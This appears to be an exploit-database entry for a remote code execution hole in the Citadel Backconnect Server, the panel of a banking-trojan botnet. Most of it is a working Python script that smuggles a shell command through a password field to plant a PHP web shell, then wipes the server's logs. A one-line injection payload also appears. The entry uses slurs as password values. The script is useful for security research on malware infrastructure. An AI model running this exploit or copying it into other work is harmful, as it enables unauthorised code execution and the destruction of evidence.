Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability

2013-12-31T00:00:00
ID 1337DAY-ID-21720
Type zdt
Reporter Xylitol
Modified 2013-12-31T00:00:00

Description

start "background_exec" cbcs.exe listen -cp:faggot -bp:hacker | echo "<?php phpinfo(); ?>" >> shell.php#### Usage Info Edit the code and run !

                                        
                                            import urllib
import urllib2

# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box 

def request(url, params=None, method='GET'):
	if method == 'POST':
		urllib2.urlopen(url, urllib.urlencode(params)).read()
	elif method == 'GET':
		if params == None:
			urllib2.urlopen(url)
		else:
			urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
	data = {
		'b'  : 'tapz',
		'p1' : 'faggot',
		'p2' : 'hacker | echo "' + payload + '" &gt;&gt; ' + filename
	}
	request(url + 'test.php', data)

def shellExists(url):
	return urllib.urlopen(url).getcode() == 200
	
def cleanLogs(url):
	delete = {
		'delete' : ''
	}
	request(URL + 'control.php', delete, 'POST')

URL      = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD  = '&lt;?php phpinfo(); ?&gt;'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
	print '[-]', FILENAME, 'not found...'
else:
	print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'

#  0day.today [2018-01-05]  #